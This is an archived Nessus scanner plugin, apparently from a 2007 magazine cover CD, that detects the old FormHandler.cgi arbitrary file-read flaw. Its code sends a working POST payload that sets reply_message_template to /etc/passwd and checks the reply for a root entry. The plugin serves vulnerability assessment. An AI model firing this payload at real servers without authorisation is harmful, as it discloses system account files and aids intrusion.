home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / formhandler.nasl < prev    next >
Text File  |  2005-01-14  |  3KB  |  94 lines

  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10075);
  10.  script_bugtraq_id(799);
  11.  script_version ("$Revision: 1.18 $");
  12.  script_cve_id("CAN-1999-1051");
  13.  name["english"] = "FormHandler.cgi";
  14.  name["francais"] = "FormHandler.cgi";
  15.  script_name(english:name["english"], francais:name["francais"]);
  16.  
  17.  desc["english"] = "The 'FormHandler.cgi' cgi is installed. This CGI has
  18. a well known security flaw that lets anyone read arbitrary
  19. file with the privileges of the http daemon (root or nobody).
  20.  
  21. Solution : remove it from /.
  22.  
  23. Risk factor : High";
  24.  
  25.  
  26.  desc["francais"] = "Le cgi 'FormHandler.cgi' est installΘ. Celui-ci possΦde
  27. un problΦme de sΘcuritΘ bien connu qui permet α n'importe qui de faire
  28. executer des commandes arbitraires au daemon http, avec les privilΦges
  29. de celui-ci (root ou nobody). 
  30.  
  31. Solution : retirez-le de /.
  32.  
  33. Facteur de risque : SΘrieux";
  34.  
  35.  
  36.  script_description(english:desc["english"], francais:desc["francais"]);
  37.  
  38.  summary["english"] = "Attempts to read /etc/passwd";
  39.  summary["francais"] = "Essaye de lire /etc/passwd";
  40.  
  41.  script_summary(english:summary["english"], francais:summary["francais"]);
  42.  
  43.  script_category(ACT_ATTACK);
  44.  
  45.  
  46.  script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison",
  47.         francais:"Ce script est Copyright (C) 1999 Renaud Deraison");
  48.  family["english"] = "CGI abuses";
  49.  family["francais"] = "Abus de CGI";
  50.  script_family(english:family["english"], francais:family["francais"]);
  51.  script_dependencie("find_service.nes", "smtp_settings.nasl");
  52.  script_require_ports("Services/www", 80);
  53.  exit(0);
  54. }
  55.  
  56. #
  57. # The script code starts here
  58. #
  59. include("http_func.inc");
  60.  
  61. port = get_http_port(default:80);
  62.  
  63. if(get_port_state(port))
  64. {
  65.  domain = get_kb_item("Settings/third_party_domain");
  66.  s = string("POST /FormHandler.cgi HTTP/1.1\r\n",
  67.      "User-Agent: Nessus\r\n",
  68.      "Host: ", get_host_name(), "\r\n",
  69.      "Accept: image/gif, image/x-xbitmap, */*\r\n",
  70.      "Accept-Language: en\r\n",
  71.      "Content-type: application/x-www-form-urlencoded");
  72.      
  73.  s2 = string("realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=nessus%40",
  74.        domain,
  75.        "&redirect=http%3A%2F%2Fwww.",
  76.        domain,
  77.        "&recipient=nessus%40",
  78.        domain,
  79.       "\r\n\r\n");
  80.  
  81.  s3 = string(s,s2);
  82.  
  83.  soc = http_open_socket(port);
  84.  if(soc)
  85.  {
  86.     send(socket:soc, data:s3);
  87.     b = http_recv(socket:soc);
  88.     if(egrep(pattern:"root:.*:0:[01]:.*", string:b))security_hole(port);
  89.     http_close_socket(soc);
  90.  }
  91.  
  92.  
  93.